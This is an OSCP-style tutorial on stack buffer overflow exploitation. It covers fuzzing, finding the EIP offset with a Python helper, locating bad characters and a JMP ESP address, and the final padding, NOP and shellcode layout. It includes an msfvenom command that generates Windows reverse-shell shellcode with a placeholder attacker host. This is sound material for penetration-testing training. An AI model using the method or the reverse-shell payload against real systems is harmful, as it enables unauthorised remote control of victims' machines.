# Buffer Overflow (Stack)

The foundation of binary exploitation: if you control EIP, you control the flow of execution.

## 🛑 Step-by-Step Methodology (OSCP Style)

### 1. Spiking & Fuzzing

Find which command, and how many bytes, crash the application.

* Python script that sends incrementally longer strings of 'A's.

### 2. Finding the Offset

At exactly which position within those 2000 'A's does the overwrite reach EIP?

1. Generate a unique (cyclic) pattern:

   ```bash
   /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000
   ```
2. Crash the app with the pattern and read the value left in EIP (e.g. `396F4338`).
3. Calculate the offset:

   ```bash
   /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 396F4338
   ```

### 3. Overwriting EIP

Confirm that you fully control EIP.

```mermaid
graph TD
    A[Buffer Start] -->|'A' * Offset| B["EIP (Instruction Pointer)"]
    B -->|'B' * 4| C["ESP (Stack Pointer)"]
    C -->|Shellcode| D[Malicious Code Execution]
    style B fill:#f96,stroke:#333
    style D fill:#f9f,stroke:#333
```

* Payload: `padding + "B"*4 + trailing`.
* EIP should read `42424242`.
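Steps 2 and 3 reproduced offline, as an added example that is not part of the original page: the same triplet layout that `pattern_create.rb` emits, the offset lookup that `pattern_offset.rb` performs (including the little-endian flip that turns the displayed EIP `396F4338` into the substring `8Co9`), and a check of what EIP shows after the `"B"*4` overwrite. Function names and the 3000-byte default are assumptions of this example.

```python
import string
import struct

UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits
MAX_PATTERN = len(UPPER) * len(LOWER) * len(DIGITS) * 3  # 20280 bytes before the pattern repeats


def pattern_create(length: int) -> bytes:
    """Same layout as pattern_create.rb: triplets <upper><lower><digit>, the digit
    cycling fastest, i.e. b'Aa0Aa1Aa2...Aa9Ab0Ab1...'. Every 4-byte window is unique
    within MAX_PATTERN bytes, which is what makes the offset lookup unambiguous."""
    if not 0 < length <= MAX_PATTERN:
        raise ValueError(f"length must be in 1..{MAX_PATTERN}")
    out = bytearray()
    for up in UPPER:
        for lo in LOWER:
            for dg in DIGITS:
                out += (up + lo + dg).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)  # not reached: the length check above guarantees an early return


def pattern_offset(eip_hex: str, length: int = 3000) -> int:
    """Offset of the bytes that landed in EIP, as pattern_offset.rb computes it.
    The debugger prints EIP as a number, but the stack stored it little-endian,
    so 396F4338 corresponds to the pattern substring b'8Co9'."""
    needle = struct.pack("<I", int(eip_hex, 16))
    idx = pattern_create(length).find(needle)
    if idx < 0:
        raise ValueError(f"{eip_hex} ({needle!r}) not found in a {length}-byte pattern")
    return idx


def confirm_eip_control(offset: int, total: int) -> str:
    """Step 3 in memory: build padding + b'B'*4 + trailing filler and read back the
    4 bytes at `offset` the way the debugger would display EIP (expected 42424242)."""
    if total < offset + 4:
        raise ValueError("payload too short to reach EIP")
    payload = b"A" * offset + b"B" * 4 + b"C" * (total - offset - 4)
    return f"{struct.unpack('<I', payload[offset:offset + 4])[0]:08X}"


if __name__ == "__main__":
    off = pattern_offset("396F4338")          # -> 2006
    print("offset:", off, "EIP after overwrite:", confirm_eip_control(off, 3000))
```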

### 4. Bad Characters

Identify the bytes the application does not handle correctly (e.g. `\x00`, `\x0a`).

* Send the byte array `\x01` through `\xff`.
* Compare it against what landed in memory (Immunity Debugger -> `!mona compare`).

### 5. Finding JMP ESP

We need a static memory address that performs a "jump to the stack", where our shellcode will be placed.

* `!mona jmp -r esp -cpb "\x00..."`

### 6. Generate Shellcode

```bash
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=443 EXITFUNC=thread -f c -a x86 -b "\x00"
```

### 7. The Exploit

Final structure: `Padding (A) + JMP ESP Address + NOPs (\x90 * 16) + Shellcode`
